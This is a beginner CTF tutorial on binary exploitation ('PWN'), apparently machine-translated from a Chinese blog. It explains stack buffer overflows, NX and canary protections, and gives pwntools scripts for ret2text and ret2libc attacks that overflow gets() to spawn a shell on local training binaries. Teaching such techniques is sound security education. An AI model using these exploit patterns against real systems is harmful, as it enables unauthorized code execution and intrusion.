What is PWN

The basis of PWN

1. The origin of PWN

The CTF competition mainly displays the following skills: reverse engineering, cryptography, ACM programming, Web vulnerabilities, binary overflow, network and forensics. In international CTF events, binary overflow is also called PWN.

PWN is a slang term for hacker grammar, which is derived from the word "own". The meaning of this word is that the player is in the advantage of victory in the entire game, or that the competitor is in a complete fiasco. The term is traditionally used in online game culture to mock the competitors who have been completely defeated in the entire game (for example: "You just got pwned!"). There is a very famous international event called Pwn2Own, I believe you can now understand the meaning of this name, that is, to defeat the opponent to achieve the purpose.

The PWN question type in the CTF usually directly gives a compiled binary program (EXE under Windows or ELF file under Linux, etc.), and then the competitors find and exploit the vulnerability through reverse analysis and debugging of the binary program. Use the code to achieve the effect of overflow attacks through remote code execution, and finally get the shell of the target machine to capture the flag.

Second, the Linux pipeline

The Linux pipeline can use the standard output of one process as the standard input of another process. The operation symbol of the pipeline is "|". For example, the ls command can be used to view the list of files in the current directory, and the grep command can be used to match specific characters, so The ls | grep test command can be used to list files that contain test in the current directory.

Three, Python basics

Execute python -c "print 'Hello'" in the Linux shell to execute the Python statement in double quotes, that is, print out the Hello string through print. There is no difference between single quotes and double quotes in Python, because double quotes are used here to modify Python statements, so single quotes are used to modify strings.

Four, gdb debugger

gdb is a command line debugger commonly used under Linux and has very powerful debugging functions. The gdb commands needed in this article are as follows:

 

image

Five, compilation basis

Reading common assembly instructions is the basic requirement for PWN problem solving in CTF competitions:

 

image

In assembly language, the esp register is used to indicate the position of the top of the stack of the current function stack frame. Local variables in the function are stored in the stack space, and the stack growth direction is downward (that is, from the high address to the low address).

Buffer overflow means that when the computer fills the buffer with data bits, the capacity of the buffer itself is exceeded, so that the overflowed data is overwritten on the legal data. Ideally, the program checks the data length and does not allow the input to exceed the buffer length. Character, but most programs will assume that the data length always matches the allocated storage space, which lays a hidden danger for buffer overflow.

---

Getting started with PWN

1. What knowledge do you need to learn pwn?

The loopholes are generally 1. There is no limit to the input of the gets function, which leads to overflow. 2. Format string vulnerability. 3. An overflow occurred during data type conversion. In general, it is not enough to restrict the input value so that the user's input affects the execution flow. So how do you exploit vulnerabilities? There is a system function system ("/ bin / bash") in Linux to call the shell. Let the program perform this function can be achieved in a call to the shell ^_ .

Second, what needs attention

There are two issues to be clear about overflow: 1. Where is the loophole, that is, we can put our own code or characters into the function and affect the execution. 2. What do we want it to do.

Three, simple pwn

```
nt __cdecl main(int argc, const char **argv, const char **envp) { char s; // [esp+1Ch] [ebp-64h] setvbuf(stdout, 0, 2, 0); setvbuf(_bss_start, 0, 1, 0); puts("There is something amazing here, do you know anything?"); gets(&s); printf("Maybe I will tell you next time !"); return 0; } ``` 这里需要安装pwntools[这里可以安装工具](https://blog.csdn.net/gyhgx/article/details/53439417) ``` from pwn import * payload='A'*112+p32(0x0804863a) p=process("./ret2text") p.recvline() p.sendline(payload) p.interactive() ``` 112临时变量|addr(s)-ebp|+4 0x0804863a这个地址处是 ``` .text:0804863A mov dword ptr [esp], offset command ; "/bin/sh" .text:08048641 call _system ``` 

4. System protection mechanism

Of course, the system also has many protection mechanisms

The checksec tool can help us check the protection that the program opens.

The following is the execution result of checksec

root@kali:~/桌面# checksec ret2text [!] Pwntools does not support 32-bit Python. Use a 64-bit release. [*] '/root/\xe6\xa1\x8c\xe9\x9d\xa2/ret2text' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 

Now the two I contact are NX and stack. NX protection is that the code in the station is not executable. Stack is to put a canary value in the stack. Once the value is modified, it will trigger the check_failed () function, print the program name and exit.

NX protection:

If you ca n’t do it, I wo n’t do it. The content in the stack is only responsible for introducing the program execution flow to a location where assembly code is needed, and then calling some of the program ’s own code to implement the attack. You can call the code containing call or ret so that you can continue to connect. This is the ROP chain.

cannary：

When the function executes, it puts a value into a position on the stack. If we want to overflow the return address, we need to change this value. When returning, the system checks whether the canary value has changed. If it changes, we call the check_failed () function to print The program name then exits. Based on this principle we can 1, find the value of canary and fill it in. 2. The call address of check_ \ failed () can be overwritten with system ()

What if system and "/ bin / bash" are not put together

This is the result of ida decompilation.

int __cdecl main(int argc, const char **argv, const char **envp) { char s; // [esp+1Ch] [ebp-64h] setvbuf(stdout, 0, 2, 0); setvbuf(_bss_start, 0, 1, 0); puts("RET2LIBC >_<"); gets(&s); return 0; } 

The only difference is that the system and the string "/ bin / bash" are separated.

Below is the script

from pwn import *

elf=ELF('ret2libc1') payload='A'*112+p32(elf.plt['system'])+'aaaa'+p32(0x8049720) p=process("./ret2libc1") p.recvline() p.sendline(payload) p.interactive() 

Pay attention to the payload plt is used by elf to load the dynamic library, which is an address, and a jmp xxx xxx is the address of the system. 'aaaa' is the return address of the system, no need to return so this value is useless, p32 (0x8049720) is the address of '/ bin / bash'. It should be noted that the previous example only needs to pass in the parameters. Here, entering the system is not only that we need to arrange the '/ bin / bash' but also the return address.

Author: Chen Xuanxiao
link: https: //www.jianshu.com/p/4ce73b3f8f4c
Source: Jane books
are copyrighted by the author. For commercial reproduction, please contact the author for authorization, and for non-commercial reproduction, please indicate the source.